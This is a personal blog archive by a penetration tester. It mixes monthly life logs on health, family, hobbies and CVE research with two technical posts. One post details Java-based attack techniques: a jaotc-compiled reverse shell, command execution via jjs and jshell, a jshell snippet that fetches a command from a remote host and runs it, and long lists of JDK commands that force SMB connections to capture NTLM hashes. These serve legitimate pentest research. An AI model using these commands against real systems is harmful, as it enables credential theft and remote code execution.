Captain’s Log: December 2021

December was mostly a roaring success. I started to feel more like the me of old. I enjoyed time with my family and my partner. It was honestly a great end to the year. With a blip of being ill via Covid Booster in the last week of work. But C’est la vie. Progress isn’t a straight line and roads all get bumpy.

Time for the sort of monthly/annual summary:

TargetSummary
11k steps a dayThis was a target I set 12 months ago. After I had managed a full 365 days of doing 10k steps a day. It seemed like a minimal increase and one that was entirely achievable. Having moved myself so regularly in 2020 I was ready for massively increased activity and to finally lose weight again. Sadly I hurt my foot/ankle in March and I never really recovered. This was dead from the first quarter basically.
150 active minutes per weekThis was the “real” target for 2021. Yea I had done raw movement but now I wanted to structure genuine exercise back on a regular basis. I did manage this from December 2020 until the “injury”. Then it was unachievable while I adopted a strategy of resting up until the pain went away.
1 technical blog a monthI started 2021 with about 8 posts in draft and figured I would just put those out. When I delved into it some of the posts were now more-or-less irrelevant as the technologies were pretty much retired, dwindling, or when I googled found others had been quicker at posting the ideas. If we substitute this ambition for “do more security research” then I definitely managed that.

I was involved in three research projects which generated 17 CVE vulnerabilities blogged out of my employers website. There has been a slow down at getting CVE numbers issued by Mitre noticeable in the back end of 2021 which has held my final disclosure posts up.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songsI have definitely managed this and then some. So well done me. Still got many years of learning to do here but it really helps to set aside time to make music.
OSWEReplaced this with sitting an exam that work needed me to do. One attempt was aborted last minute due to waiting on a kid’s negative COVID test meaning I could not travel to sit the exam. I did get to sit the exam in December and as I am writing this I await the result.
Panic AttacksDecember was an excellent month. So lets start with that. I got a lot more sleep than usual. I was far more relaxed as a result.

However, I did have one panic incident. This was triggered by the stress of travelling to London to sit the exam. I knew this one was going to come because I have been stuck in the house so long. The thought of getting on a plane was low key terrifying me for months. So obviously I had some proper white-knuckle terror moments after I checked my bag in at Glasgow airport. I just wanted to get in a taxi straight home and write off whatever was in my bag. You can make your own fight or flight joke here because I certainly have! It is plainly ridiculous to the cold logic engine which normally runs my brain.

I called my wife who talked me off the ledge. I splashed some water on my face and I took it one task at a time. As predicted the flight was actually fine and, as always, the journey home was an absolute riot where I felt none of the ill effects.

If we talk about the entirety of 2021 then I had fewer and much less impactful bouts than 2020. This is because I have coping strategies and I am exposing myself to triggers to challenge the absolute nonsense that is going on in the silly part of my brain. I think the trend will remain downwards in 2022.

Other bits

Audiobooks – still plodding on with the Shoal series. I have completed Nova War, and have moved on to Empire of Light. As I have gotten back some mobility I have been able to walk around listening to audiobooks. This has massively helped improve my mood. I listened to several hours of this on my trip to London.

Television 1 – Babylon 5. My partner (probably a bigger nerd than me) had never seen B5. So I halted my re-watch around season 3 and started it again with them in the evenings. It has been really nice seeing them predict the plot twists several times and use their fantastic talent of spotting any jobbing actor that has ever been in Star Trek within moments regardless of how heavily made up they were in either show. This is an honest to god super power! Sometimes the voice is enough. It is amazing.

Television 2 – Star Trek (Original Series). Such melodrama. I live for the musical cues. Episodic content where every character resets between the end of one show and the next week is kind of jarring in the modern age. I cannot get over how Ltd Uhura had her ENTIRE MEMORY ERASED in one episode. They start to teach her basic skills and by next week she was totally over it! If you have any example of a character being reset harder than that I would love to hear it!

Video Games 1 – Wolfenstein: the new colossus. What a wild ride! I am only a few hours into it and have massively enjoyed the story. It is absolutely nuts.

Video Games 2 – Football Manager 2021 (not the latest one). I do enjoy spreadsheets and I have certainly got my monies worth out of this over the last 12 months. I have a save game where Scotland won a Euros championship about 4 years from now. Lets hope life imitates that save game 😀

Family – Kid A has been improving their behaviour by virtue of finally maturing. Progress is not a straight line and we are still getting frequent calls from the school about them. But there are more good days than there were before. The penny is starting to drop. Kid B is now showing a hilarious and much more chilled personality than Kid A. They are very different beasts.

House – planning permission and drawings all done for a loft conversion so we are going to have to find building companies to give us quotes. Finding trusted partners to do projects is always the real challenge. We are fighting whatever Brexit nonsense RE: materials and labour so the project might be dead before it is off the ground if the prices are out of range.

  • Plan A is “top down” – loft conversion. If the quotes are reasonable. Otherwise…
  • Plan B is “bottom up” – the ground floor is an absolute mess and we can get significantly better living conditions by replacing the kitchen and bathroom which we definitely have the budget for. Annoying that the home report lied so hard about the condition of the place that this is now necessary to replace floors that are marked as “category 1 – Excellent”.

Health – saving the biggest bit for the end. I went to a private Physio twice before Christmas. I had been waiting several months for a GP referral to land before resuming exercise. I had put on weight due to inactivity and it was making me more miserable. The Physio has confirmed that the pain is now most likely because I have rested an injury too long and allowed that area to atrophy. A few stretches and exercises chucked my way and I have already significantly reduced the pain. The main thing I needed was confidence that resuming exercise was not going to risk further injury and I was told categorically this was not the case. So I am taking baby steps back to jogging which is an activity that always improves my physical and mental health enormously. I have been given a green light to do the thing I wanted to. I am already seeing early results and cannot wait!

Regards

Captain’s Log: November 2021

This month was remarkable for the joy of walking again! It is truly a simple pleasure to be able to go places. Last month I broke a toe and it is now ok to walk again.

TargetSummary
11k steps a dayI am not really aiming for this as I recover from the various injuries. I have managed two or three 10k steps a day per week this month which is a step in the right direction.
150 active minutes per weekNowhere close. But I managed about half from the walking. A huge improvement from a month of being stationary. My mood and everything is so much better.
1 technical blog a monthFinally published research via the work blog covering 10 CVEs in OpenCMS 11.0.2. These were found in collaboration with my colleague Sam Moore. I also published a Proof Of Concept for the ClickJacking vulnerability which resulted in admin level access.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songsI have probably recorded more than 5 songs for the year. So lets smash that goal this month.. *woo*.

I am making it a pretty regular hobby now. Considering upping my game with collaborations, or maybe biting the bullet and getting singing lessons and such. I have never taken it seriously but it is kind of fun.

I have not practiced playing guitar so often in my entire life and can feel lots of gains.
OSWEThis was a personal goal. I was asked by work to pursue another exam so this is probably not going to happen. If we are honest I am getting the joy of studying and improving my technical ability anyway. So this has changed to be “study to get better at the technical side”. I have been smashing through some more stacks so it is paying off.
Panic AttacksNovember was a pretty clear month. One or two moments where I needed to remember to hydrate and rest.

Other bits

Panic Attacks– I have not been on a train in years. The last time I did, I had a panic attack. Now I know that it was entirely unrelated in my conscious mind. But it is undeniable that I have chosen to avoid trains since. It was very unpleasant to be stuck on a train for 3 hours panicking back at a time I had no coping techniques at my disposal. I do have tools now. Soooooo… I went on four different trains this month. Not going to lie. There was definite uneasiness on the outward journeys. But I *always* came home smiling and full of the joys of life. Exposure therapy in action. The image for this post shows my face on the way out and back on my first trip.

Audiobooks – still plodding on with the Shoal series. I have completed Nova War, and have moved on to Empire of Light. As I have gotten back some mobility I have been able to walk around listening to audiobooks. This has massively helped improve my mood.

Television 1 – Doctor Who was back with a bang! On Halloween an opener to the Flux story line left me thirsty for more. Then this month it continued to deliver joy. It was nice to properly watch this with the kids. They have mostly sat there politely and let us watch it.

Television 2 – I watch all of Kim’s Convenience this month. It was joyous. Let some of this into your heart.

Public Speaking – I did a talk at Edinburgh Defcon for the firs time. I always figured I would be drinking beers in Edinburgh when I did. But… It was good to get off the fence.

Video Games 1 – Hollow Knight has been a bit of an obsession the last 2 months. I have sunk around 60 hours into it. I was attempting to get the PS4 trophies and also generally just loved getting lost in it. The platforming was joyous, the art gorgeous, and the boss battles challenging. I could have completed the story much faster but I kept hunting around for more to do. I am letting this linger on and refuse to end the story until I have done the fools challenge.

Video Games 2 – Wolfenstein: the new colossus. I somehow missed that this came out. The story is absolutely WILD. I am surely not even half of the way into this and it is such a roller coaster. I write this after a very powerful scene. The plot twist was absolutely brilliant.

Family – I played a lot of board and card games with the kids. We went to the park several times. Their granny visited. The eldest had some play dates. I taught my eldest literally everything I know about playing the piano, then we jammed! They are getting good at singing and hopefully getting confidence from it. We put the Christmas decorations up together. It was all rather nice.

House – We have tried to get builders to quote for an attic conversion. Not many have come to view the project. None have as yet delivered a quote. We still have no idea if we can even afford to do this. I have gone with doing smaller things myself regularly to feel progress. This month we built a new cabinet for the kitchen and finally gained the counter space and storage we needed to put all of our kitchen stuff into the kitchen. The next project will be to sort through the things in the kitchen so that they are to hand where they should be. This will be a big change.

This was mostly a great month.

Regards

Captain’s Log: October 2021

First, a highlight. I recorded a wee video which should speak to parents everywhere:

I was waiting for paint to dry with the front door open for air flow when I made this. As a bonus the neighbours have left me alone since!

This was a month marred by breaking my big toe on my left foot. It was sore but I have had worse. The featured image is the first day I managed to brave putting a shoe on. I have now healed up and am raring to start a bit of walking again.

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my right ankle in March so this took a backburner. I started October getting back to decent mobility. Then guess what? I broke the big toe on my left foot! A temporary set back. By the last week of October I was able to walk about without flinching so I am hitting November with delusions of walking around again. I need to. I have put so much weight on with all these setbacks.
150 active minutes per weekNowhere close. The broken toe really made this impossible.
1 technical blog a monthI sneaked out a short blog post about finding missing patches in .net applications where you don’t have the source code.

There is also one that is still ready and waiting on some CVE references to get assigned.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songsI have probably recorded more than 5 songs for the year. I am making it a pretty regular hobby now. Considering upping my game with collaborations, or maybe biting the bullet and getting singing lessons and such. I have never taken it seriously but it is kind of fun.
OSWEI’ll be honest I think this is a Winter time activity. I was due to sit an exam this month so I took on the Portswigger Academy labs for a while. I really appreciate that these labs existed and that they are available for free. I still have lots of them to get through but I might actually do that exam instead of OSWE.
Panic AttacksThe start of October was pretty brilliant. I was getting back into the zone. I was sleeping, I was eating right, and exercise was in the right direction. The foot injury had the possibility of dragging me into depression but I chose to tell myself it was a brief delay and it worked. It was a tough month but I weathered it well.

Other bits

Audiobooks – still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I did not really get the time for this it deserves. But it is good.

Television 1 – Deep Space 9. I finished this again. There are episodes that need to start with “warning; contains Gul Dukat and Kai Winn kissing”. Still a very entertaining show. Some really amazing episodes.

Television 2 – Watching Another Life season 2. I am completely bemused as to what happened in Season 1. There was no recap and me and my partner in crime were significantly confused. It is a good show. I love that the aliens are clearly Scottish “Ach-aye-ians”? You cannot hide that from me.

Television 3 – Doctor Who was back with a bang! On Halloween an opener to the Flux story line left me thirsty for more.

Television 4 – I re-watched Kimmy Schmidt. An excellent show. Lots of laughs in there and yet they covered quite a lot about mental health and inclusivity too. Honestly joyous.

Family – Unfortunately my foot injury happened the day before I had days booked off for half term. Instead of jollies I ended up with my foot up and yelling at the kids to please stop hitting it (which appeared to be their chosen activity) ! Classic. Then when I was back to a bit of mobility there was a cold/flu that ran through the family sticking us in several staggered periods of isolation awaiting COVID tests. It was a very tough week the one before Halloween. I upped the interaction with my eldest by getting off the bench and playing the Pokemon card game several times. With my partner being ill I was doing a lot of extra things and it was challenging.

House – I have started doing small DIY projects in the house. One a week. I have stared at damage I am capable of fixing for the entire 12 months we have lived here. The problem has been we know there will be a massive building project (attic conversion) and anything I do will likely get destroyed then. It has been depressing since the chances are a decent building firm will be booked into 2022 or 2023. In finally accepting that. I have decided to do minor patching and decorating myself. It is certainly making me feel better about the place. The plaster work is so bad that if we ever properly “do” a room, we are going to need it to be ripped back to brick and plastered before anything is done. Until doing that everything is just mucking around.

That is the log for October. I am looking forward to November. All the bad luck is officially over because I have decided it is.

If you have kids. I wish they eat their food for you.

Finding Missing Patches the hard way

In this post I present a short piece of PowerShell that helped me find missing patches in a .net application. The target was a thick client where source code was not provided. Almost everything has outdated dependencies and the goal for me is to see if any of them will provide an obvious way to exploit the target. Even if the dependencies are not exploitable it is great to get an insight into the development practices.

The backwards/hard way (No Source code)

The problem (for .net) can be broken into two stages:

  1. Identify the version information for all .dll files.
  2. Grunt work using Google to find the latest versions and any known vulnerabilities.

The first part was solved by the PowerShell below. Simply change the path and you get the filename and version number comma separated:

Get-ChildItem "C:\<path>\<to>\<folder>" -Filter *.dll | 
Foreach-Object {
    $version = (Get-Command $_.FullName).FileVersionInfo.FileVersion
    echo "$_,$version"
}

Then for the dirty task. Opening that output in Excel and using Google to confirm which were outdated. There is probably a short cut somewhere for this task but in the time available that did me.

What if you have the source code?

When you have source code access then your go to is to use OWASP’s Dependency-Check.

While I love Dependency-check, and feel like it is the best catch all due to the wide range of languages it supports. I have also found that it is prone to false-positives. Working with the formats it outputs is often a lot of work for me at least. It is definitely a worthy tool and I will continue to use it.

If you have access to the source then I generally get better and more actionable information using language specific tools such as:

Hope this helped you in your hour of need.

Captain’s Log: September 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. Working on it with stretches and am back to walking about a bit. Hit several 10k steps days in the month too.
150 active minutes per weekNowhere close. But I was closer than last month so positive.
1 technical blog a monthIt is written but waiting for the vendor patches which are in mid-October.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songsI still don’t know how to use reaper but I have found the odd hour long slots to write and record some stuff. It is all rough and cringey but I guess you don’t get anywhere without practice.

Smiles
Cowboys Have Metaphors
No Manual

There was also a Webinar that I did for work where I ended with a song. I have linked to that bit of the video at the end.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksSeptember was a very stressful month at times. We were ill in a loop after the kids returned to school/nursery. There were several negative covid tests and many many lost hours of sleep. As always. The panic attacks come when there is a lack of sleep. For the September weekend we got away some place. It was invigorating so I ended the month really probably the happiest I have been in a while. Hence the music getting made.

Other bits

  • Research – Vendor is releasing patches in October so I will be able to speak about this on various blogs next month. I have invested £99 in a bit of hardware just to go looking for vulns to mix up the target for the next time. That has not panned out great so far. It has actually been a pretty hard target given the limited number of features enabled and real effort being put into disabling all the androidy options that you would usually be able to flip on.
  • Work Stress – I had a very stressful time at work early in September where I put in an ungodly amount of hours over a week. I got the thing done so eventually feel good about it but living through it. But I was pretty close to burning out. I did get support from colleagues when I put my hand up so remember to work places where you can play that card and know you will get assistance.
  • Audiobooks – Still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I am not really getting the time for this it deserves. But it is good.
  • Television 1 – Deep Space 9. Really close to the end of it. There has been noise about Netflix losing various Star Trek franchises soon. Initially that seems to just be in the US but I guess the writing is on the wall. A fair amount of Netflix’s appeal to me is because it has ST properties. So lets see.
  • Television 2 – Man Down. I finally got around to watching it all. What a great show that was. Disappointed to not get a resolution to the cliffhanger ending. It made me seriously crave more Rik Mayall energy. His part in the first series was absolutely electric.
  • Family – First weekend we did play date on the Saturday then a nice breakfast at café. This was nice because I actually met some dad’s for a change. Usually I head along to the park for the exercise. But hey there I was debating whether a 36 year old Cristiano Ronaldo would have earned his transfer fee back in shirt sales already. I think yes. Kid 1 is getting to an age where they can almost watch a game of football with me staying up late to do so having survived the Scotland vs Moldova game.
  • Family 2 – We managed a long weekend away from the house. I am dubbing this the anxiety buster. After years of cancelled or hectic and horrible holidays we managed one where I mostly relaxed. I came back more positive and more able to sign up to things.
  • Car Upgrade – Got a new car stereo fitted. Because who knew that phones would be made one day in the future without Aux cables??? Had to join the Bluetooth revolution eventually I guess.

For those who stuck to the end. Here is the outtro song from the Webinar I did:

Yes that is majorly product placement for my current employer. But that was the gig. Technically I was paid to write a song there so I am now semi-professional.

That is the log for September.

Captain’s Log: August 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. Working on it with stretches and am back to walking about a bit.
150 active minutes per weekNot found an exercise I can get done with my ankle like this. There is quite limited availability for swimming pools atm due to covid and my exercise bike would put pressure on the ankle. Waiting on a referral to see whats what with it. Though just at the end of the month I got back on the bike as the ankle had felt better for several days.
1 technical blog a monthIt is written but waiting for the vendor patches.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songsI played with Reaper a bit more. But no completed songs. I still don’t know how to use DAWs because I am fairly chaotic and have zero sense of timing.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksI have been well clear of panic attacks. Probably because I mostly got sleep when sleep was good to be got. But to clarify I feel a sense of dread literally every time I go to do something. It is exhausting to push through that sometimes but I always drive home happy and singing from every jaunt out.

Other bits

  • Research – Waiting on a vendor to patch vulns before I can toot about the next batch.
  • Audiobooks – Still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I am not really getting the time for this it deserves. But it is good.
  • Television 1 – Deep Space 9. This is probably the 3rd time I have started watching it through. This time I am seeing it through the lens of racism. The whole show seems to be about hating the Cardassians at the start. Even from Miles who is supposed to be an enlightened Human member of Star Fleet.
  • Family – Still working on fun for family, fun for me and my partner, and fun for me. Not doing too badly at it. We have been out and about more for food. To a few museums. It has been pleasant. We even made it to a swimming pool in Glasgow for the first time this year. It has been impossible to book slots all summer. When they stopped taking bookings we rocked up at 9am to be told there was an hour to wait and we were entirely unprepared for that. So it was a victory to finally get into a pool.
  • Family 2 – With the return to school we have gained a less stressful work-life balance (aside from odd drop off and pickup times). My partner (and primary child herder) has enjoyed a few weeks of afternoons free of childcare and has thoroughly and deservedly chilled out. The much delayed thinking about returning to work is now back on the cards. It is rarely spoken about how childcare can be monotonous and unrewarding for some people. But because of love, and covid, they have stuck ably to the task for years beyond the age nurseries would take the kids. Not to be a martyr, but because we believed it was right to do it this way for us. That has come at a cost to our mental health at times. The last time there was light at the end of this tunnel lockdowns started and punched that back down hard for over a year. Living a life waiting for time to tick is exceptionally hard.
  • Pentesting – I found a target with “.svn” folders and used svn-extractor to get the win.
  • Housey stuff – Most weekends this August we do about an hour of tidying up as a family and get the place pretty decent. Many hands make light work and all that! That is what this months featured image is about. The fact we were tidying stuff regularly. As a result I was also able to do some of the DIY tasks and get things variously recycled, gifted, or out of my life for ever as appropriate. My home office has had a re-orientation and I am considering getting a second desk for “hobbies”. We have also paid for a new floor for the kitchen and are waiting on an installation date. It will be great to finally be able to mop a surface. I could rant for hours about how this house has broken flooring everywhere but I won’t.

That is the log for August.

Java giving more shells on everything

Back in 2018 I blogged about how java gives a shell for everything, and also how to compile in memory as an AV Evasion technique. Some of these techniques have now been added into gtfo bins, and heroes even integrated them into metasploit.

In this post I go through the most recent JDK/JRE and look for new features Pentesters may find useful. Apologies for this reading a bit like a shotgun blast of information. But this is essentially the notes I took as I poked around in the order I did it. I am personally most interested in the last part with “jshell” if you want to see just one part then go there.

First what about different Versions of Java?

There are two major versions of Java:

  • Java Runtime Environment (JRE) – Which is used on machines that only need to execute Java code. The binary “java” is used to execute code.
  • Java Development Environment (JDK) – Which is needed on developer machines. The “javac” command is used to compile “.java” files into “.class” files which can then be executed.

If you have landed on a laptop or workstation the chances are only the JRE is installed unless the user is a developer. If you land on a server which hosts a website powered by Java you probably have the JDK installed. There are far more binary commands bundled in the JDK than the JRE so there is more scope for naughtiness with the JDK.

Comparison of Binaries Available in JRE/JDK

I downloaded the most recent Windows JRE and JDK and compared the list of executables in the “/bin” folder. The raw data is in this spreadsheet. The short version is that these are the binaries which are shared between the JRE and JDK:

Shared
jabswitch
java
javaw
keytool
kinit
klist
ktab
rmid
rmiregistry
List of commands shared by JRE and JDK

If you find something that works in these binaries then you should congratulate yourself for finding a universal Java technique.

Other points of note from the spreadsheet:

  • jjs.exe exists in the latest JRE meaning our JavaScript payload techniques are still in play there.
  • jrunscript.exe exists in the latest JDK. However, there appeared to be no Nashorn included.

I can confirm that Nashorn worked in “jjs.exe” for the most recent JRE:

Hello from Nashorn in JRE

And that it did not work out of the box for “jrunscript.exe” in the most recent JDK:

No Nashorn for you.

While the binary exists it has been neutered unless Nashorn has been added separately.

An easier command prompt via JJS

Last time I gave JavaScript commands that you could type into a JJS prompt which would give you a reasonably interactive command prompt. The reason for doing this is to get a functional command prompt in an environment where maybe powershell.exe, cmd.exe, and ftp.exe etc are all blocked. In that universe “jjs.exe” worked no problem. I mean where exclude lists are used instead of allow lists for running binaries.

This time I properly RTFM and spotted this nugget:

The JJS Manual

If you run “jjs” with “-scripting=true” then it will give you access to the “$EXEC()” function. This can be used to execute local commands within JJS without needing to type in any JavaScript:

Using $EXEC

A minor improvement depending on how you want to look at it. It is a little inconvenient typing “$EXEC()” every time. So you can save a few keystrokes with a simple function that shortens it:

using “a” function to alias $EXEC()

But then I got intrigued by what other binaries were hanging around in a modern JDK install. So I looked into the contents of the “bin” folder again.

Ahead of Time Compilation with jaotc

I spotted a new binary called “jaotc” which has a useful tutorial here. Jaotc is summarised as:

“The Java static compiler that produces native code for compiled Java methods”

Ears of hackers must have pricked up there. Did you say “native code”? Can confirm it did. It aims to make faster Java apps by allowing you to convert a class to native code.

It will compile a class file into a “.so” library. Lets assume you have a reverse shell in “rev.java” your work flow is like this:

javac rev.java
jaotc --output rev.so rev.class

Line 1 compiles it into normal Java Bytecode.
Line 2 converts that to a native library.

If you run the file command it is now an ELF binary:

file rev.so
rev.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped

Who knows what transforms have just gone on to make that magic work. The transforms might be useful for hiding payloads. I am not a reverse engineer by any stretch of the term so I have probably not grasped the hacking potential of this.

To run your library via Java you need to do this:

java -XX:+UnlockExperimentalVMOptions -XX:AOTLibrary=./rev.so

Note: at the moment this is an experimental option so you need the “UnlockExperimentalVMOptions” argument.

It will work on Linux and on Windows Linux Subsystem. There is no support for compiling “.dll” files so this is going to be a niche choice, and I am not entirely sure how to use it for nefarious purposes today. A pin in that for later maybe.

Triggering DNS/Getting NTLM Hashes

JDK/JRE binaries allow input files within their command line arguments. These accept UNC paths so can be used to trigger DNS resolution. If you are on the same network (or the Firewall is crazy and allows SMB outbound) then you can use responder to capture NTLM hashes:

Capturing hashes landing in Responder Logs

Note: I have a recent post which includes a bit on how to crack these hashes.

JDK/JRE binaries have a myriad of options which handle file paths. I stopped looking when I found one way to do it per binary or I had spent longer than 5 minutes looking. Therefore this is not exhaustive and there will be more:

jar -v -t --file=\\192.168.45.129\test
jarsigner-verify \\192.168.45.129\test
java \\192.168.45.129\test
javac \\192.168.45.129\test
javadoc \\192.168.45.129\test
javap \\192.168.45.129\test
jcmd 1 -f \\192.168.45.129\test
jdeprscan.exe \\192.168.45.129\test
jdeps \\192.168.45.129\test
jfr metadata \\192.168.45.129\test
jhsdb clhsdb --core \\192.168.45.129\test --exe test.exe # Do not use this
jimage info \\192.168.45.129\test
jlink --module-path \\192.168.45.129\test
jmap -histo:live,file=\\192.168.45.129\test <pid> # Requires PID for valid Java Process
jmod list \\192.168.45.129\test
jpackage --input \\192.168.45.129\test --main-jar test
jrunscript.exe -cp \\192.168.45.129\test
jshell \\192.168.45.129\test
kinit -c \\192.168.45.129\test
klist -c -f FILE:\\192.168.45.129\test
ktab -k FILE:\\192.168.45.129\test
rmid -log \\192.168.45.129\test

Note: the “jhsdb” command opens its own command prompt interface which would remain open if you had a victim open it. While it did result in an SMB handshake I would not advise using this.

In addition to those above, I found an almost universal way to trigger an SMB interaction. Most binaries would run a JVM when they execute, which makes sense because they are made in Java. The JVM supports various options. The “Xloggc” option (or the incoming “-Xlog:gc” syntax) can specify the location for a log file whenever the JVM does garbage collection. It accepts UNC paths.

The beautiful thing is that this triggers an SMB connection as the JVM loads meaning that you do not need to supply valid command line arguments to the binary you are launching. This saves a lot of effort reading “–help”.

The following is a list of examples that worked for the most recent JDK binaries:

jaccessinspector.exe -J-Xloggc:\\192.168.45.129\test
jarsigner.exe -J-Xloggc:\\192.168.45.129\test
javadoc -J-Xloggc:\\192.168.45.129\test
javap -J-Xloggc:\\192.168.45.129\test
javaw -Xloggc:\\192.168.45.129\test # This causes a GUI popup error
jcmd -J-Xloggc:\\192.168.45.129\test
jconsole -J-Xloggc:\\192.168.45.129\test # This causes a GUI popup error
jdb -J-Xloggc:\\192.168.45.129\test
jdeprscan -J-Xloggc:\\192.168.45.129\test
jdeps -J-Xloggc:\\192.168.45.129\test
jfr -J-Xloggc:\\192.168.45.129\test
jhsdb -J-Xloggc:\\192.168.45.129\test
jimage -J-Xloggc:\\192.168.45.129\test
jinfo -J-Xloggc:\\192.168.45.129\test
jlink -J-Xloggc:\\192.168.45.129\test
jmap -J-Xloggc:\\192.168.45.129\test
jmod -J-Xloggc:\\192.168.45.129\test
jpackage -J-Xloggc:\\192.168.45.129\test
jps -J-Xloggc:\\192.168.45.129\test
jrunscript -J-Xloggc:\\192.168.45.129\test
jshell -J-Xloggc:\\192.168.45.129\test              
jstack -J-Xloggc:\\192.168.45.129\test     
jstat -J-Xloggc:\\192.168.45.129\test              
jstatd -J-Xloggc:\\192.168.45.129\test      
keytool -list -J-Xloggc:\\192.168.45.129\test
kinit -J-Xloggc:\\192.168.45.129\test
klist -J-Xloggc:\\192.168.45.129\test              
ktab -J-Xloggc:\\192.168.45.129\test             
rmid.exe  -J-Xloggc:\\192.168.45.129\test
rmiregistry -J-Xloggc:\\192.168.45.129\test
serialver -J-Xloggc:\\192.168.45.129\test

Pretty much every binary in the JDK supported this approach!

As the “java” command runs the JVM directly there is a no need for the “-J-” part so this is the syntax for doing the same there:

java -Xloggc:\\192.168.45.129\test

When a binary existed in both the JDK and JRE there were subtle differences. For example, the JDK version of “javaw” required the “-J-” syntax, while the JRE version worked using “-Xloggc” directly.

As always experiment on your own computer before attempting the technique on a victim’s PC. That nugget of advice is pure gold and will save you thousands of wasted hours.

jshell is my new favourite thing

This command was new to me and its name immediately stood out as potentially useful. This makes Java an interpreted language!!! You can write whatever Java you want and it executes it exactly the same way as using the Python interpreter for example:

InputStream inputStream = new URL("http://192.168.45.129/test").openStream();
String cmd = new BufferedReader(new InputStreamReader(inputStream)).lines().collect(Collectors.joining("\n"));
Process proc = Runtime.getRuntime().exec(cmd);
String result = new BufferedReader(new InputStreamReader(proc.getInputStream())).lines().collect(Collectors.joining("\n"));

The above will download a file over HTTP and save the contents of the file into the “cmd” String. It will then run that command and save the output to the “result” string. The screenshot below shows this operating:

Using jshell

I saved the command “whoami” in the “test” file which was then served using a python HTTP listener like this:

python -m SimpleHTTPServer 80

You can see that above in the line saying cmd ==> “whoami”.

Additionally, you can store Java commands in a .jsh file and then have them execute as shown:

jshell whatever.jsh

If you save the above example into “whatever.jsh” it will run the commands blindly and you won’t see what was run. If you type “result” though the output from the command will be there. This puts your payload on Disk where it is more likely to be gobbled by AV.

There is a nice tutorial for jshell here. To me this has the same impact as “jrunscript” and “jjs” did before for Nashorn. Only now you are writing payloads in Java instead of JavaScript.

This thing is gorgeous and I love it because it is another scripting language essentially and one which may be a blind spot.

Captain’s Log: July 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. I have basically given myself a free pass and seen my health decline as a result. Now I am back to doing more exercise. Mixing YouTube videos with the kids and other activity. I have seen my steps back up to around the 10k a day mark. This is progress but it is slow. Then right at the end of the month my ankle has started hurting again. Time to get a GP involved.
150 active minutes per weekStart of July was a nightmare in terms of hay fever. I figure better cardio health is probably a good tool for bad days. So I have resolved to increase this again. Now the battle is getting what fitbit determines to be “Active Zone” minutes. Several times I have been out murdering parts of the garden dripping with sweat only to find that hour didn’t count. Logically I was definitely working hard. Not sure how to be measuring this now.
1 technical blog a monthI have failed to achieve this.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings.
Record five songsI did not make anything ready to release. I have acquired a new DAW (Reaper) but have not had time to go through any tutorials for it. This is in the wake of Audacity going to the dogs and because I never quite got along with Ableton Live Lite which I have used before. I have done a lot of playing guitar in the garden but have not recorded anything.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksI had the start of a panic attack after gardening and probably reacting badly to all of the pollen. When you cannot breathe that is a good time to start a panic in my opinion. I got over it pretty quickly.

We went to Edinburgh for a weekend and the start of the drive definitely had me feeling the panic rising. This is possibly because I have not been further than 3 miles all pandemic. The hotel was worryingly about 5 degrees C hotter inside than outside in a heat wave. I have sensitivity around being too hot and if I cannot cool down then I am not really able to relax. Eventually we did what we had booked before we arrived and then checked out as soon as possible and went home. The thought of a second night not sleeping in the furnace of a room was not great.

Other bits

  • Research – Having cleared the Fedena stuff I finally went hunting for more CVEs. As part of a team at work we have found 10 new CVE worthy vulnerabilities in another bit of Open Source software. The vendor has been responsive (result!) and hopefully I can turn this around in way less than 12 months to disclosure like Fedena was. There is scope for a blog and a talk at DC44141 for September IF they can get the patches out in time.
  • Euro 2020 – What an amazing tournament this was. I really enjoyed it. Scotland’s cameo showed we needed a striker but that is life. Our players have experience now so lets go for more qualifications.
  • Audiobooks 1 – as I have picked up the exercise and steps again I have finally completed Stealing Light: Shoal, Book 1 by Gary Gibson. This was really entertaining and had some nice ideas in there. I am now a couple of hours into the second book in the series.
  • Television 1 – Deep Space 9. This is probably the 3rd time I have started watching it through. This time I am seeing it through the lens of racism. The whole show seems to be about hating the Cardassians at the start. Even from Miles who is supposed to be an enlightened Human member of Star Fleet.
  • Movies – We watched Parasite. It was a fun couple of evenings (because parents can rarely watch a film in one sitting).
  • Family – I have made an effort to ensure each day has fun for me, fun for me and the kids, and fun for me and my partner. I think the pandemic really had done a number on my happiness. This seems to be the way to go. We went on a trip to Edinburgh (the first time I have gone more than 3 miles since lockdown 1). This was largely a success.
  • Outside 1 – We travelled more than 3 miles for the first time since lockdown 1. We went to Edinburgh to see the Ray Harryhausen exhibit. I thoroughly recommend it if you have enjoyed any of his movies growing up. It has many models that made me go *squee*. Highlight of the trip for the kids was a go in a swimming pool at the hotel. This was a great weekend because I didn’t have a major freak out and this is progress. It gets easier as the kids get bigger.
  • Outside 2 – Last weekend of July we went to the Glasgow Science Centre. This is always a joyous experience and you should also give that a go. The soft play part on the middle floor is closed (probably because Covid would make that a nightmare to police). There is still oodles to see and do. We gave the cafe a go and rate it pretty highly.

That is the log for July.

Captain’s Log: June 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. I am out of this game for the foreseeable.
